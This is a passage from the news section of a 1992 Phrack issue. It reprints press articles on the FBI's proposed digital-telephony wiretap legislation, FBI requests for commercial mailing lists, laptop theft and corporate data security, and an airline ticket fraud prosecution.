|
private payphones, end-users of PBX systems, federal, state and local law
|
|
enforcement agencies and prosecutors.
|
|
|
|
Janice Langley, a spokeswoman for US Sprint Corp. in Kansas City, Mo., called AT&T's announcement similar to a program her company announced March 31.
|
|
|
|
That service, SprintGuard Plus, is available to companies with a call volume
|
|
of $30,000 a month. Sprint also offers basic monitoring program to customers
|
|
without charge.
|
|
|
|
"We don't have minimum billing requirements for any of these services or
|
|
systems," responded AT&T's Neresian. "All the carriers have seen the problem
|
|
and have been working on their own approaches," he said.
|
|
|
|
Jim Collins, a spokesman for MCI Communications in Washington, said his company
|
|
had been conducting phone fraud workshops free of charge for customers for four
|
|
years.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 12 of 13
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN Phrack World News PWN
|
|
PWN PWN
|
|
PWN Issue XXXIX / Part Three of Four PWN
|
|
PWN PWN
|
|
PWN Compiled by Datastream Cowboy PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
New Phones Stymie FBI Wiretaps April 29, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Simson L. Garfinkel (Christian Science Monitor)(Page 12)
|
|
|
|
"Legislation proposed by Justice Department would change the way
|
|
telecommunications equipment is developed in the United States."
|
|
|
|
For more than 50 years, wiretapping a telephone has been no more difficult than
|
|
attaching two clips to a telephone line. Although legal wiretaps in the United
|
|
States have always required the approval of a judge or magistrate, the actual
|
|
wiretap has never been a technical problem. Now that is changing, thanks to
|
|
the same revolution in communications that has made car phones, picture
|
|
telephones, and fax machines possible.
|
|
|
|
The only thing a person tapping a digital telephone would hear is the
|
|
indecipherable hiss and pop of digital bits streaming past. Cellular
|
|
telephones and fiber-optic communications systems present a would-be wiretapper
|
|
with an even more difficult task: There isn't any wire to tap.
|
|
|
|
Although cellular radio calls can be readily listened in on with hand-held
|
|
scanners, it is nearly impossible to pick up a particular conversation -- or
|
|
monitor a particular telephone -- without direct access to the cellular
|
|
telephone "switch," which is responsible for connecting the radio telephones
|
|
with the conventional telephone network.
|
|
|
|
This spring, the Federal Bureau of Investigation (FBI) unveiled legislation
|
|
that would require telephone companies to include provisions in their equipment
|
|
for conducting court-ordered wiretaps. But critics of the legislation,
|
|
including some members of Congress, claim that the proposals would expand the
|
|
FBI's wiretap authority and place an undue burden on the telecommunications
|
|
industry.
|
|
|
|
Both sides agree that if provisions for monitoring communications are not made
|
|
in the planning stages of new equipment, it may eventually become impossible
|
|
for law enforcement personnel to conduct wiretaps.
|
|
|
|
"If the technology is not fixed in the future, I could bring an order [for a
|
|
wiretap] to the telephone company, and because the technology wasn't designed
|
|
with our requirement in mind, that person could not [comply with the court
|
|
order]," says James K. Kalstrom, the FBI's chief of engineering.
|
|
|
|
The proposed legislation would require the Federal Communications Commission
|
|
(FCC) to establish standards and features for makers of all electronic
|
|
communications systems to put into their equipment, require modification of all
|
|
existing equipment within 180 days, and prohibit the sale or use of any
|
|
equipment in the US that did not comply. The fine for violating the law would
|
|
be $10,000 per day.
|
|
|
|
"The FBI proposal is unprecedented," says Representative Don Edwards (D) of
|
|
California, chairman of the House Judiciary Subcommittee on Civil and
|
|
Constitutional Rights and an outspoken critic of the proposal. "It would give
|
|
the government a role in the design and manufacture of all telecommunications
|
|
equipment and services."
|
|
|
|
Equally unprecedented, says Congressman Edwards, is the legislation's breadth:
|
|
The law would cover every form of electronic communications, including cellular
|
|
telephones, fiber optics, satellite, microwave, and wires. It would cover
|
|
electronic mail systems, fax machines, and all networked computer systems. It
|
|
would also cover all private telephone exchanges -- including virtually every
|
|
office telephone system in the country.
|
|
|
|
Many civil liberties advocates worry that if the ability to wiretap is
|
|
specifically built into every phone system, there will be instances of its
|
|
abuse by unauthorized parties.
|
|
|
|
Early this year, FBI director William Sessions and Attorney General William
|
|
Barr met with Senator Ernest F. Hollings (D) of South Carolina, chairman of the
|
|
Senate Commerce Committee, and stressed the importance of the proposal for law
|
|
enforcement.
|
|
|
|
Modifying the nation's communications systems won't come cheaply. Although
|
|
the cost of modifying existing phone systems could be as much as $300 million,
|
|
"We need to think of the costs if we fail to enact this legislation," said Mr.
|
|
Sessions before a meeting of the Commerce, Justice, State, and Judiciary
|
|
Subcommittees in April. The legislation would pass the $300 million price-tag
|
|
along to telephone subscribers, at an estimated cost of 20 cents per line.
|
|
|
|
But an ad-hoc industry coalition of electronic communications and computer
|
|
companies has objected not only to the cost, but also to the substance of the
|
|
FBI's proposal. In addition, they say that FCC licensing of new technology
|
|
would impede its development and hinder competitiveness abroad.
|
|
|
|
Earlier this month, a group of 25 trade associations and major companies,
|
|
including AT&T, GTE, and IBM, sent a letter to Senator Hollings saying that "no
|
|
legislative solution is necessary." Instead, the companies expressed their
|
|
willingness to cooperate with the FBI's needs.
|
|
|
|
FBI officials insist that legislation is necessary. "If we just depend on
|
|
jaw-boning and waving the flag, there will be pockets, areas, certain places"
|
|
where technology prevents law enforcement from making a tap, says Mr. Kalstrom,
|
|
the FBI engineer. "Unless it is mandatory, people will not cooperate."
|
|
|
|
For example, Kalstrom says, today's cellular telephone systems were not built
|
|
with the needs of law enforcement in mind. "Some companies have modified their
|
|
equipment and we can conduct surveillance," he says. But half of the companies
|
|
in the US haven't, he adds.
|
|
|
|
Jo-Anne Basile, director of federal relations for the Cellular
|
|
Telecommunications Industry Association here in Washington, D.C., disagrees.
|
|
|
|
"There have been problems in some of the big cities because of [limited]
|
|
capacity," Ms. Basile says. For example, in some cities, cellular operators
|
|
had to comply with requests for wiretaps by using limited "ports" designed for
|
|
equipment servicing. Equipment now being installed, though, has greatly
|
|
expanded wiretap capacity in those areas.
|
|
|
|
"We believe that legislation is not necessary because we have cooperated in
|
|
the past, and we intend on cooperating in the future," she adds.
|
|
|
|
The real danger of the FBI's proposal is that the wiretap provisions built in
|
|
for use by the FBI could be subverted and used by domestic criminals or
|
|
commercial spies from foreign countries, says Jerry Berman, director of the
|
|
Electronic Frontier Foundation, a computer users' protection group in
|
|
Cambridge, Mass.
|
|
|
|
"Anytime there is a hearing on computer hackers, computer security, or
|
|
intrusion into AT&T, there is a discussion that these companies are not doing
|
|
enough for security. Now here is a whole proposal saying, 'Let's make our
|
|
computers more vulnerable.' If you make it more vulnerable for the Bureau,
|
|
don't you make it more vulnerable for the computer thief?"
|
|
|
|
Civil liberties advocates also worry that making wiretaps easier will have the
|
|
effect of encouraging their use -- something that the FBI vehemently denies.
|
|
|
|
"Doing a wiretap has nothing to do with the [technical] ease," says Kalstrom.
|
|
"It is a long legal process that we must meet trying all other investigations
|
|
before we can petition the court."
|
|
|
|
Kalstrom points out the relative ease of doing a wiretap with today's telephone
|
|
system, then cites the federal "Wiretap Report," which states that there were
|
|
only 872 court-approved wiretaps nationwide in 1990. "Ease is not the issue.
|
|
There is a great dedication of manpower and cost," he says. But digital
|
|
wiretapping has the potential for drastically lowering the personnel
|
|
requirements and costs associated with this form of electronic surveillance.
|
|
Computers could listen to the phone calls, sitting a 24-hour vigil at a low
|
|
cost compared with the salary of a flesh-and-blood investigator.
|
|
|
|
"Now we are seeing the development of more effective voice-recognition
|
|
systems," says Edwards. "Put voice recognition together with remote-access
|
|
monitoring, and the implications are bracing, to say the least."
|
|
|
|
Indeed, it seems that the only thing both sides agree on is that digital
|
|
telephone systems will mean more secure communications for everybody.
|
|
|
|
"It is extremely easy today to do a wiretap: Anybody with a little bit of
|
|
knowledge can climb a telephone poll today and wiretap someone's lines," says
|
|
Kalstrom. "When the digital network goes end-to-end digital, that will
|
|
preclude amateur night. It's a much safer network from the privacy point of
|
|
view."
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
FBI Fight With Computer, Phone Firms Intensifies May 4, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Taken from Los Angeles Times (Business, Part D, Page 2)
|
|
|
|
"Spy Agencies Oppose Technology That Will Prevent
|
|
Them From Tapping Into Data And Conversations"
|
|
|
|
Top computer and telecommunications executives are fighting attempts by the FBI
|
|
and the nation's intelligence community to ensure that government surveillance
|
|
agencies can continue to tap into personal and business communications lines as
|
|
new technology is introduced.
|
|
|
|
The debate flared last week at a House Judiciary Committee hearing on foreign
|
|
intelligence agencies' attempts to gather U.S. companies' secrets. The
|
|
committee's chairman, Representative Jack Brooks (D-Tex.), called the hearing
|
|
to complain that the FBI and the National Security Agency (NSA) are hurting
|
|
companies' attempts to protect their communications.
|
|
|
|
The issue has been heating up on two fronts. Phone companies have been
|
|
installing digital equipment that frustrates phone tapping efforts, and
|
|
computer companies are introducing new methods of securing data transmissions
|
|
that are almost impossible for intelligence agencies to penetrate.
|
|
|
|
The controversy centers, in part, on an FBI attempt to persuade Congress to
|
|
force telephone companies to alter their digital networks, at a possible cost
|
|
of billions of dollars that could be passed on to ratepayers, so that the FBI
|
|
can continue performing court-authorized wiretaps. Digital technology
|
|
temporarily converts conversations into computerized code, which is sent at
|
|
high speed over transmission lines and turned back to voice at the other end,
|
|
for efficient transmission.
|
|
|
|
Civil liberties groups and telecommunications companies are fiercely resisting
|
|
the FBI proposal, saying it will stall installation of crucial technology and
|
|
negate a major benefit of digital technology: Greater phone security. The
|
|
critics say the FBI plan would make it easier for criminals, terrorists,
|
|
foreign spies and computer hackers to penetrate the phone network. The FBI
|
|
denies these and other industry assertions.
|
|
|
|
Meanwhile, the NSA, the nation's super-secret eavesdropping agency, is trying
|
|
to ensure that government computers use a computer security technology that
|
|
many congressmen and corporate executives believe is second-rate, so that NSA
|
|
can continue monitoring overseas computer data transmissions. Corporations
|
|
likely would adopt the government standard.
|
|
|
|
Many corporate executives and congressmen believe that a branch of the Commerce
|
|
Department that works closely with NSA, the National Institute of Standards and
|
|
Technology (NIST), soon will endorse as the government standard a computer-
|
|
security technology that two New Jersey scientists said they penetrated to
|
|
demonstrate its weakness. NIST officials said that their technology wasn't
|
|
compromised and that it is virtually unbreakable.
|
|
|
|
"In industry's quest to provide security (for phones and computers), we have a
|
|
new adversary, the Justice Department," said D. James Bidzos, president of
|
|
California-based RSA Data Security Inc., which has developed a computer-
|
|
security technology favored by many firms over NIST's. "It's like saying that
|
|
we shouldn't build cars because criminals will use them to get away."
|
|
|
|
"What's good for the American company may be bad for the FBI" and NSA, said
|
|
Representative Hamilton Fish Jr. (R-N.Y.). "It is a very heavy issue here."
|
|
|
|
The situation is a far cry from the 1950s and 1960s, when companies like
|
|
International Business Machines Corporation and AT&T worked closely with law-
|
|
enforcement and intelligence agencies on sensitive projects out of a sense of
|
|
patriotism. The emergence of a post-Vietnam generation of executives,
|
|
especially in new high-technology firms with roots in the counterculture, has
|
|
short-circuited the once-cozy connection, industry and government officials
|
|
said.
|
|
|
|
"I don't look at (the FBI proposal) as impeding technology," FBI Director
|
|
William S. Sessions testified at the Judiciary Committee hearing. "There is a
|
|
burden on the private sector . . . a price of doing business."
|
|
|
|
FBI officials said they have not yet fumbled a criminal probe due to inability
|
|
to tap a phone, but they fear that time is close. "It's absolutely essential
|
|
we not be hampered," Sessions said. "We cannot carry out our responsibilities"
|
|
if phone lines are made too secure.
|
|
|
|
On the related computer-security issue, the tight-lipped NSA has never
|
|
commented on assertions that it opposes computerized data encryption
|
|
technologies like that of RSA Data Security because such systems are
|
|
uncrackable.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
For more articles on this same topic, please see:
|
|
|
|
Phrack 38, File 11; The Digital Telephony Proposal.
|
|
_______________________________________________________________________________
|
|
|
|
FBI Seeks Compiled Lists For Use In Its Field Investigation April 20, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Ray Schultz (DMNews)(Page 1)
|
|
Special Thanks: The Omega and White Knight
|
|
|
|
Washington, D.C. -- The Federal Bureau of Investigation, in a move that could
|
|
spell trouble for the industry, reported is seeking commercial mailing lists
|
|
for use in its investigations.
|
|
|
|
Spokespersons for both MetroMail Corporation and Donnelley Marketing confirmed
|
|
that they were approached for services within the last two weeks and other
|
|
firms also received feelers.
|
|
|
|
Neither of the identified firms would discuss details, but one source familiar
|
|
with the effort said the FBI apparently is seeking access to a compiled
|
|
consumer database for investigatory uses.
|
|
|
|
The FBI agents showed "detailed awareness" of the products they were seeking,
|
|
and claimed to have already worked with several mailing list companies,
|
|
according to the source.
|
|
|
|
Metromail, which has been supplying the FBI with its MetroNet address lookup
|
|
service for two years, did not confirm this version of events. Spokesperson
|
|
John Tomkiw said only that the firm was asked by the FBI about a "broadening"
|
|
of its services.
|
|
|
|
The firm has supplied the bureau with a full listing of its products and
|
|
services, but has not yet been contacted back and is not sure what action it
|
|
will take, said Tomkiw.
|
|
|
|
Donnelley was also vague on the specifics of the approach, but did say it has
|
|
declined any FBI business on the grounds that it would be an inappropriate use
|
|
of its lists.
|
|
|
|
FBI spokesperson Bill Carter was unable to provide confirmation, although he
|
|
did verify that the FBI uses MetroNet to locate individuals needed for
|
|
interviews.
|
|
|
|
If the database scenario is true, it would mark the first major effort by a
|
|
government agency to use mailing lists for enforcement since the Internal
|
|
Revenue Service tried to use rented lists to catch tax cheats in 1984.
|
|
|
|
"We have heard of it," said Robert Sherman, counsel to the Direct Marketing
|
|
Association and attorney with the firm of Milgrim Thomajan & Lee, New York.
|
|
"We'd like to know more about it. If it is what it appears to be, law
|
|
enforcement agents attempting to use marketing lists for law enforcement
|
|
purposes, then the DMA and industry would certainly be opposed to that on
|
|
general principles."
|
|
|
|
Such usage would "undermine consumer confidence in the entire marketing process
|
|
and would intrude on what otherwise would be harmless collection of data,"
|
|
Sherman said.
|
|
|
|
RL Polk, which has not been contacted, said it would decline for the same
|
|
reasons if approached.
|
|
|
|
"That's not a proper use of our lists," said Polk chairman John O'Hara. "We're
|
|
in the direct mail business and it's our policy not to let our lists be used
|
|
for anything but marketing purposes."
|
|
|
|
According to one source, who requested anonymity, the FBI intimated that it
|
|
would use its subpoena power if refused access to the lists.
|
|
|
|
The approaches, made through the FBI training center in Quantico, VA,
|
|
reportedly were not the first.
|
|
|
|
The FBI's Carter said the MetroNet product was used for address lookups only.
|
|
|
|
"If a field office needs to locate somebody for an interview, we can check the
|
|
[MetroNet] database as to where they reside and provide that information to the
|
|
field office," he said.
|
|
|
|
However, the product was cited as a potential threat to privacy last year by
|
|
Richard Kessel, New York State Consumer Affairs Commissioner.
|
|
|
|
In a statement on automatic number identifiers, Kessel's office said that "one
|
|
firm offers to provide 800-number subscribers immediate access to information
|
|
on 117-million customers in 83-million households nationwide.
|
|
|
|
"The firm advertises that by matching the number of an incoming call into its
|
|
database, and an 800 subscriber within seconds can find out such information as
|
|
whether the caller has previously purchased items from their companies."
|
|
|
|
Kessel included a copy of a trade ad for MetroNet, in which the product is
|
|
presented as a direct marketing tool.
|
|
|
|
Under the headline "Who am I?" the copy reads as if it is by an imaginary
|
|
consumer.
|
|
|
|
"The first step to knowing me better is as easy as retrieving my phone number
|
|
in an Automatic Number Identification environment," it says. "Within seconds
|
|
you can search your internal database to see if I've purchased from you before.
|
|
And if it's not to be found, there's only one place to go -- to MetroNet.
|
|
|
|
"MetroNet gives you immediate access to information on 117-million consumers in
|
|
83-million households nationwide: recent addresses; phone numbers; specific
|
|
demographics and household information."
|
|
|
|
Tomkiw defended the product, saying its primary focus is "direct marketing.
|
|
We're always sensitive to those types of issues."
|
|
|
|
MetroNet works as an electronic white pages, but does not contain "a lot of
|
|
demograhpic data," he said. "It's primarily used by the real estate and
|
|
insurance industries."
|
|
|
|
The 1984 IRS effort reportedly was a failure, but it created a public outcry
|
|
and much negative publicity for the industry. Though Polk, MetroMail and
|
|
Donnelley all refused to rent their lists for the effort, the IRS was able to
|
|
locate other lists through Dunhill of Washington. Most industry sources say
|
|
that such efforts are doomed to fail because lists are useful only in
|
|
identifying people in aggregate, not as individuals."
|
|
_______________________________________________________________________________
|
|
|
|
Do You Know Where Your Laptop Is? May 11, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Robert Kelly (InformationWeek)
|
|
|
|
Are your executives carrying computers with critical data?
|
|
If so, company secrets are vulnerable
|
|
|
|
It was an expensive round of window shopping. On December 17, 1990, David
|
|
Farquhar parked his car in downtown London to browse through an automobile
|
|
showroom. A Wing Commander in Great Britain's Royal Air Force, he was enjoying
|
|
a few moments away from the mounting pressures leading up to the Gulf War,
|
|
which would begin less than a month later.
|
|
|
|
But Farquhar made a huge mistake: He left his laptop computer in his car. And
|
|
although he was gone a mere five minutes, by the time he returned, the laptop
|
|
had been stolen -- as had U.S. General Norman Schwarzkopf's plans, stored in
|
|
the computer's disk drive, for the upcoming Allied strike against Iraq.
|
|
|
|
Farquhar paid dearly for his carelessness. Soon after the red-faced Wing
|
|
Commander reported the incident, he was court-martialed, demoted, and slapped
|
|
with a substantial fine. The computer was anonymously returned a week later-
|
|
with the disk drive intact.
|
|
|
|
Farquhar may feel alone in his dilemma and rue the wrong turn his life has
|
|
taken, but such episodes are anything but isolated. Though electronic security
|
|
sources say it's too soon to keep score yet on the exact number of laptop
|
|
thefts, anecdotally, at least, it appears a computer crime wave is underway.
|
|
According to electronic data experts, during the past 18 months, as laptop
|
|
purchases have soared, theft has taken off also.
|
|
|
|
For instance, at the Computer Security Institute (CSI), an organization that
|
|
ironically comprises corporate security experts, a half-dozen members have
|
|
already reported their company laptops stolen, says Phil Chapnick, director of
|
|
the San Francisco-based group. And there are probably more that aren't
|
|
speaking about it, he adds: "Victims prefer to maintain a low profile."
|
|
|
|
So do the perpetrators, obviously. But a picture of who some of them are is
|
|
beginning to emerge, says John Schey, a security consultant for the federal
|
|
government. He says a roving band of "computer hit men" from New York, Los
|
|
Angeles, and San Francisco has been uncovered; members are being paid upwards
|
|
of $10,000 to steal portable computers and strategic data stored on those
|
|
machines from executives at Fortune 1,000 companies. Federal agents, Schey
|
|
adds, are conducting a "very, very dynamic and highly energized investigation
|
|
to apprehend the group." U.S. law enforcement authorities refuse to comment on
|
|
the issue.
|
|
|
|
Laptop theft is not, of course, limited to the United States. According to
|
|
news reports, and independently confirmed by InformationWeek, visiting
|
|
executives from NCR Corp. learned that reality the hard way recently when they
|
|
returned to their rooms after dinner at the Nikko Hotel in Paris to find the
|
|
doors removed from their hinges. The rooms were ransacked, turned upside down,
|
|
but the thieves found what they were looking for. All that was taken were two
|
|
laptops containing valuable corporate secrets.
|
|
|
|
Paul Joyal, president of Silver Spring, Maryland, security firm Integer and a
|
|
former director of security for the Senate Intelligence Committee, says he
|
|
learned from insiders close to the incident that French intelligence agents,
|
|
who are known for being chummy with domestic corporations, stole the machines.
|
|
Joyal suspects they were working for a local high-tech company. An NCR
|
|
spokesman denies knowledge of the incident, but adds that "with 50,000
|
|
employees, it would be impossible to confirm." Similar thefts, sources say,
|
|
have occurred in Japan, Iraq, and Libya.
|
|
|
|
It's not hard to figure out why laptop theft is on the rise. Unit sales of
|
|
laptops are growing 40% annually, according to market researchers Dataquest
|
|
Inc., and more than 1 million of them enter the technology stream each year.
|
|
Most of the machines are used by major companies for critical tasks, such as
|
|
keeping the top brass in touch when they're on the road, spicing up sales calls
|
|
with real data pulled from the corporate mainframe, and entering field data
|
|
into central computers. Because of laptops, says Dan Speers, an independent
|
|
data analyst in West Paterson, New Jersey, "there's a lot of competitive data
|
|
floating around."
|
|
|
|
And a perfect way to steal information from central corporate databases.
|
|
Thieves are not only taking laptops to get at the data stored in the disk
|
|
drives, but also to dial into company mainframes. And sometimes these thieves
|
|
are people the victims would least suspect. One security expert tells of "the
|
|
wife of a salesman for a Fortune 500 manufacturing firm who worked for a direct
|
|
competitor." While her husband slept, she used his laptop to log on to a
|
|
mainframe at his company and download confidential sales data and profiles of
|
|
current and potential customers. "The husband's job," says the security
|
|
expert, "not the wife's, was terminated."
|
|
|
|
Such stories, and there are plenty of them, have led many U.S. companies to
|
|
give lip service to laptop theft, but in almost all cases they're not doing
|
|
much about it. "Management has little or no conception of the vulnerability of
|
|
their systems," says Winn Schwartau, executive director of InterPact, an
|
|
information security company in Nashville. That's not surprising, adds CSI's
|
|
Chapnick: "Security typically lags technology by a couple of years."
|
|
|
|
Playing Catch-Up
|
|
|
|
Still, some companies are trying to catch up quickly. Boeing Corp., Grumman
|
|
Corp., and Martin Marietta Corp., among others, have adopted strict policies on
|
|
portable data security. This includes training staffers on laptop safety
|
|
rules, and even debriefing them when they return from a trip. One company,
|
|
sources say, was able to use such a skull session to identify a European hotel
|
|
as a threat to data security, and put it on the restricted list for future
|
|
trips.
|
|
|
|
Conde Nast Publications Inc. is taking the the issue even more seriously. The
|
|
New York-based magazine group's 65-member sales force uses laptops to first
|
|
canvas wholesalers, then upload data on newsstand sales and distribution
|
|
problems to the central mainframe. To ensure that the corporate database isn't
|
|
poisoned by rogue data, "we have a very tight security system," says Chester
|
|
Faye, Conde Nast's director of data processing. That system's centerpiece is a
|
|
program, created in-house at Conde Nast, that lets the mainframe read an
|
|
identification code off of the chip of each laptop trying to communicate with
|
|
it. "The mainframe, then, can hang up on laptops with chip IDs it doesn't
|
|
recognize and on those reported stolen by sales reps," says Faye.
|
|
|
|
And some organizations hope to go to even greater lengths. InterPact's
|
|
Schwartau says a government agency in Great Britain wants to build a device
|
|
that attaches to a user's belt and disconnects communication to a mainframe
|
|
when the laptop deviates 15 degrees vertically. The reason: To protect
|
|
corporate data if the person using the laptop is shot and killed while dialing
|
|
in.
|
|
|
|
Users say they're taking such extreme measures because the vendors don't; most
|
|
laptops arrive from the factory without adequate security protection. Most
|
|
require a password before booting, but thieves can decipher them with relative
|
|
ease. Some also have removable hard drives, but again, these can be stolen
|
|
with similar impunity and therefore provide little protection.
|
|
|
|
Ironically, none of this may be necessary; experts emphasize that adding
|
|
security to a laptop will not serve to price it out of existence. By some
|
|
estimates, building in protection measures raises the price of a laptop by at
|
|
most 20%. Beaver Computer Corp. in San Jose, California, for example, has a
|
|
product to encrypt the data on a laptop's hard drive and floppy disks. With
|
|
this, the information can't be accessed without an "electronic key" or
|
|
password. BCC has installed this capability on its own laptop, the SL007,
|
|
which seems to have passed muster with some very discriminating customers:
|
|
Sources close to the company say a major drug cartel in Colombia wants some of
|
|
these machines to protect drug trafficking data.
|
|
|
|
Equally important is the need to protect data in the host computer from hackers
|
|
who have stolen passwords and logons. Security Dynamics Technologies Inc. in
|
|
Cambridge, Massachusetts, offers the credit card-sized SecurID, which can be
|
|
attached to most laptops. SecurID consists of a $60 device that is connected
|
|
to the laptop, and additional hardware (Cost: $3,800 to $13,000) installed on
|
|
the host. SecurID continuously changes the logon used to dial into the host;
|
|
by the time a hacker gets around to using a stolen logon, for instance, it will
|
|
be obsolete.
|
|
|
|
But what if all measures fail? You can always insure the hardware; can you
|
|
insure the data? Not yet, but soon, says Nashville-based newsletter Security
|
|
Insider Report. An upstart startup will soon begin offering data insurance
|
|
policies that may include coverage of information lost when a portable computer
|
|
is stolen.
|
|
|
|
Company Cooperation
|
|
|
|
>From protection to insurance, however, no measure can work unless laptop owners
|
|
take the problem seriously. And that doesn't always happen. Case in point: In
|
|
the late 1980s, the Internal Revenue Service approached Schwartau's firm to
|
|
develop a blueprint for securing the confidential data that travels over phone
|
|
lines between the 30,000 laptops used by field auditors and IRS offices.
|
|
Schwartau came up with a solution. But the IRS shelved its security plans, and
|
|
has done nothing about it since, he charges.
|
|
|
|
Even those who should know better can run afoul of the laptop crime wave.
|
|
About 18 months ago, Ben Rosen, chairman of laptop maker Compaq Computer Corp.,
|
|
left his machine behind on the train; it was promptly stolen. Rosen insists
|
|
there was no sensitive data in the computer, but he did lose whatever he had.
|
|
Unlike Schwarzkopf's plans, the laptop was never returned.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 13 of 13
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN Phrack World News PWN
|
|
PWN PWN
|
|
PWN Issue XXXIX / Part Four of Four PWN
|
|
PWN PWN
|
|
PWN Compiled by Datastream Cowboy PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
Airline Claims Flier Broke Law To Cut Costs April 21, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Del Jones (USA Today)(Page 1B)
|
|
|
|
CHICAGO -- American Airlines had one of its most frequent business fliers
|
|
arrested and handcuffed last summer as he prepared to board a flight at Dallas-
|
|
Fort Worth Airport.
|
|
|
|
The nation's largest airline -- and the industry's trend setter -- says it
|
|
uncovered, then snuffed, a brilliant ticket fraud scheme that cost American
|
|
more than $200,000 over 20 months. Economist William Gibson, who has homes in
|
|
Chicago and Dallas, will stand trial in early June. If convicted, he would
|
|
face a maximum prison term of 125 years. He pleads innocent, although he
|
|
readily admits using lapsed non-refundable tickets regularly to fly at rock-
|
|
bottom prices. But, he says, he did it with the full blessing of American's
|
|
agents.
|
|
|
|
Gibson says American and the FBI are out to make a high-profile example out of
|
|
him to instill a little religion into frequent business fliers, who grow bold
|
|
as they grow more resentful of an industry that makes its best customers pay
|
|
substantially higher prices than its worst.
|
|
|
|
Indeed, American Airlines says one reason it slashed full coach fares 38% two
|
|
weeks ago was to douse customer resentment that was escalating into hostility.
|
|
Now, the airline industry is again looking to American for a glimpse of the
|
|
future to see if Gibson's prosecution will set a trend toward lowering the boom
|
|
on alleged fare cheaters.
|
|
|
|
American says conclusions should not be drawn from its decision to push for
|
|
Gibson's prosecution. It alleges that he was conducting outright fraud and his
|
|
case is unrelated to the thousands of frequent fliers who break airline rules
|
|
to save money. Common rule bending includes: Flying to so-called hidden
|
|
cities when a short flight is more expensive than a long one, splitting two
|
|
non-refundable round-trip tickets over two separate trips to fly low-cost
|
|
without staying the dreaded Saturday or selling frequent-flier mileage to
|
|
brokers. But while against airline rules, such gaming, as the airlines call
|
|
it, is not against the law. And American doesn't want its prosecution of one
|
|
of its Gold AAdvantage fliers being likened to, say, Procter & Gamble asking
|
|
the FBI to bust babies who wet the most Pampers. The last thing the airline
|
|
wants, it says, is to make a martyr of Gibson, who is fighting back with not
|
|
only a lawyer but also a public-relations specialist.
|
|
|
|
"Somebody at American is embarrassed and mad," says Gibson, who flew more than
|
|
300,000 miles during the disputed 20-month period. He passed a polygraph test,
|
|
his lawyer says. But the questions fell far short of asking Gibson if his
|
|
intent in using cheap tickets was to defraud American.
|
|
|
|
Gibson, age 47, says he would never risk his career by cheating an airline.
|
|
While in his late 20s, he was President Nixon's senior staff economist, the
|
|
youngest person to hold the job. He had a hand in cleaning up the Texas
|
|
savings-and-loan mess as an organizer of the Southwest Plan. His mother still
|
|
has a photograph of his first plane trip, taken when he was in the third grade.
|
|
It was on American.
|
|
|
|
Despite his background, Gibson says he's not confident that a jury will relate
|
|
to someone who travels with "a boatload" of tickets just to avoid being
|
|
stranded or delayed. If he were flying to a family-run business in Puerto
|
|
Rico, for example, he would carry tickets that would route him through New
|
|
York, Dallas or Miami just to make sure he got where he was going and with as
|
|
little airport layover time as possible. Gibson had as many as 50 airline
|
|
tickets in his possession at one time, though some were used by his family.
|
|
|
|
American Airlines and the FBI won't reveal what Gibson did that makes him, in
|
|
their opinion, such a devious genius. Details could be a how-to lesson for
|
|
others, they say. What they do disclose is a simple scheme, but also one that
|
|
should be caught by the crudest of auditing procedures.
|
|
|
|
Gibson, they allege, would buy a full-fare coach or first-class ticket near the
|
|
time of departure. Then he would detach the expensive ticket from the boarding
|
|
pass and attach a cheap, expired ticket. The full-fare ticket, which he
|
|
allegedly bought just to secure a boarding pass, would be turned in later for a
|
|
refund.
|
|
|
|
FBI spokesman Don Ramsey says Gibson also altered tickets, which is key to the
|
|
prosecution's case because it shows intent to defraud. Ramsey would not say
|
|
what alterations allegedly were made. But they could involve the upgrade
|
|
stickers familiar to frequent passengers, says Tom Parsons, editor and
|
|
publisher of Best Fares. Those white stickers, about the size of postage
|
|
stamps, are given away or sold at token prices to good customers so they can
|
|
fly first-class in seats that otherwise would be vacant.
|
|
|
|
Parsons says Gibson could have bought a full-fare ticket to secure a boarding
|
|
pass, switched the full-fare ticket with the lapsed discount ticket and then
|
|
applied the sticker to hide the expired date. Presto, a first-class flight for
|
|
peanuts.
|
|
|
|
"I think it was an accident that they caught him," Parsons says. "And let's
|
|
just say this is not a one-person problem. A lot of people have told me
|
|
they've done this."
|
|
|
|
Gibson says he did nothing illegal or even clever. He says he learned a few
|
|
years ago that American is so eager to please its best customers, it would
|
|
accept tickets that had long ago expired. He would "load up" during American's
|
|
advertised sales on cheap, non-refundable tickets that are restricted to exact
|
|
flights on precise days. But as a member of American's Gold AAdvantage club,
|
|
reserved for its top 2% of frequent fliers, Gibson says, his expired tickets
|
|
were welcome anytime.
|
|
|
|
There was no deception, Gibson says. American's gate agents knew what they
|
|
were accepting, and they accepted them gladly, he says.
|
|
|
|
"That's absolute nonsense," says American spokesman Tim Smith. "We don't let
|
|
frequent fliers use expired tickets. Everyone assumed he had a valid ticket."
|
|
|
|
The courtesy Gibson says he was extended on a regular basis does appear to be
|
|
rare. Seven very frequent fliers interviewed by USA TODAY say they've never
|
|
flown on lapsed discount tickets. But they admit they've never tried because
|
|
the fare structure is usually designed to make sure business travelers can't
|
